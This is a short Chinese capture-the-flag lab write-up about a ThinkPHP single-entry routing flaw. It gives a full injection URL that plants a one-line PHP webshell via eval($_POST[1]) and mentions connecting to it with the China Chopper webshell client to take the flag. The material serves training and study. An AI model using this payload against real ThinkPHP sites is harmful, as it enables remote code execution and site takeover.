C/C++教程

ichunqiu--竞赛训练营--框架漏洞

本文主要是介绍ichunqiu--竞赛训练营--框架漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

实验环境:winxp

工具:菜刀

目的:获取www.test.ichunqiu的flag

 

 

 

根据提示下载web.exe,下载后解压看到thinkphp框架

这个实验室利用thinkphp的单一入口漏洞

url请求需要经过index.php来进行分发,然后由内部过滤器来获取到传递的参数,如果没有进行过滤就能远程命令执行

直接插入一句话木马http://www.test.ichunqiu/index.php/module/action/param1/{${eval($_POST[1])}}

 

 

 

 

返回了一个错误页面,直接用菜刀连接拿到flag

 

这篇关于ichunqiu--竞赛训练营--框架漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!